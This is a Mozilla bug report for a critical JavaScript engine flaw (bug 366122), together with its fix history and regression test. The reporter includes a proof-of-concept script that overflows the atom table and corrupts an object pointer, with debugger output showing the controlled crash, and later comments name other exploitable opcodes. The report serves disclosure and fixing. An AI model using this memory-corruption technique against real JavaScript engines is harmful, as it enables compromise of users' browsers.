Last Comment Bug 366122 - large script miscompiles
: large script miscompiles
Status: VERIFIED FIXED
[sg:critical?] hold for comment 10,11...
: crash, verified1.8.0.10, verified1.8.1.2
Product: Core
Classification: Components
Component: JavaScript Engine (show other bugs)
: Trunk
: All All
: -- critical (vote)
: ---
Assigned To: Igor Bukanov
:
Mentors:
Depends on: 365608
Blocks:
  Show dependency treegraph
 
Reported: 2007-01-06 01:12 PST by shutdown
Modified: 2007-06-14 15:16 PDT (History)
3 users (show)
jaymoz: blocking1.8.1.2+
jaymoz: blocking1.8.0.10+
bob: in‑testsuite+
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
Fix v1 (1.04 KB, patch)
2007-01-08 18:10 PST, Igor Bukanov
brendan: review+
dveditz: approval1.8.1.2+
dveditz: approval1.8.0.10+
Details | Diff | Splinter Review
js1_5/Regress/regress-366122.js (2.60 KB, text/plain)
2007-01-17 03:47 PST, Bob Clary [:bc:]
no flags Details

Description shutdown 2007-01-06 01:12:08 PST
$ cat 019-large-script.txt
function exploit() {
  var code = "", obj = {};
  for(var i = 0; i < 0x10000; i++) {
    if(i == 10242) {
      code += "void 0x10000050505050;\n";
    } else {
      code += "void 'x" + i + "';\n";
    }
  }
  code += "export undefined;\n";
  code += "void 125;\n";
  eval(code);
}
exploit();

$ gdb --eval run --args opt.obj/js 019-large-script.txt
...
Program received signal SIGSEGV, Segmentation fault.
js_Interpret (cx=0xab0750,
    pc=0x165aa13 "}(\002\303", '\265' <repeats 196 times>..., result=0x98e930)
    at jsinterp.c:4942
4942                id = ATOM_TO_JSID(fun->atom);
(gdb) print *obj
$1 = {map = 0x50505050, fslots = {1127219200, 6, 15145248, 6, 15145296, 6},
  dslots = 0xe71980}

exploitable.
Comment 1 Igor Bukanov 2007-01-06 04:18:23 PST
The last patch for bug 365608 fixes this.
Comment 2 Igor Bukanov 2007-01-08 06:22:34 PST
Fixed on trunk as a consequence of a general reorganisation of atom table access in bug 365608.
Comment 3 Daniel Veditz [:dveditz] 2007-01-08 08:34:08 PST
I crash on the 1.8 branch, too. TB28149817

Bug 365608 is a big change, is there something more conservative we could do for the branches, like bail out if we hit a limit?
Comment 4 Igor Bukanov 2007-01-08 09:09:26 PST
(In reply to comment #3)
> Bug 365608 is a big change, is there something more conservative we could do
> for the branches, like bail out if we hit a limit?

Sure, this would be a better solution for branches especially given the regression in bug 366312. AFAICS this bug, bug 366123 and bug 365692 cover all the cases of the problem, but I will check it one more time to be sure. 
Comment 5 Igor Bukanov 2007-01-08 18:10:51 PST
Created attachment 250923 [details] [diff] [review]
Fix v1

Minimal fix for 1.8.* branches to report an error about too big script.
Comment 6 Daniel Veditz [:dveditz] 2007-01-10 14:29:45 PST
Comment on attachment 250923 [details] [diff] [review]
Fix v1

Approved for 1.8/1.8.0 branches, a=dveditz for drivers
Comment 7 Igor Bukanov 2007-01-10 14:51:44 PST
I committed the patch from comment 5 to MOZILLA_1_8_BRANCH:

Checking in jsemit.c;
/cvsroot/mozilla/js/src/jsemit.c,v  <--  jsemit.c
new revision: 3.128.2.64; previous revision: 3.128.2.63
done
Comment 8 Igor Bukanov 2007-01-10 14:55:52 PST
I committed the patch from comment 5 to MOZILLA_1_8_0_BRANCH:

Checking in jsemit.c;
/cvsroot/mozilla/js/src/jsemit.c,v  <--  jsemit.c
new revision: 3.128.2.3.2.15; previous revision: 3.128.2.3.2.14
done
Comment 9 Bob Clary [:bc:] 2007-01-17 03:47:55 PST
Created attachment 251761 [details]
js1_5/Regress/regress-366122.js
Comment 10 shutdown 2007-01-17 23:09:49 PST
(In reply to comment #5)
> Created an attachment (id=250923) [details]
> Fix v1
> Minimal fix for 1.8.* branches to report an error about too big script. 

JSOP_SETCONT is exploitable too.
JSOP_(GET|SET)METHOD is suspicious.
Comment 11 Igor Bukanov 2007-01-19 17:04:07 PST
(In reply to comment #10)
> JSOP_SETCONT is exploitable too.
> JSOP_(GET|SET)METHOD is suspicious.

I think these all cases are exploitable since the decompiler assumes that the atom corresponding to the bytecode is string. The case of JSOP_METHOD is especially bad since one can not throw an error for too big script on it. Otherwise any script containing over 64K atoms and function calls would not compile. I will file a separated bug for it.
Comment 12 Bob Clary [:bc:] 2007-01-29 09:05:51 PST
verified fixed 1.8.0, 1.8.1, 1.9.0 2007-01-23 win/mac*/linux
Comment 13 Bob Clary [:bc:] 2007-06-14 15:16:11 PDT
/cvsroot/mozilla/js/tests/js1_5/Regress/regress-366122.js,v  <--  regress-366122.js
initial revision: 1.1

Note You need to log in before you can comment on or make changes to this bug.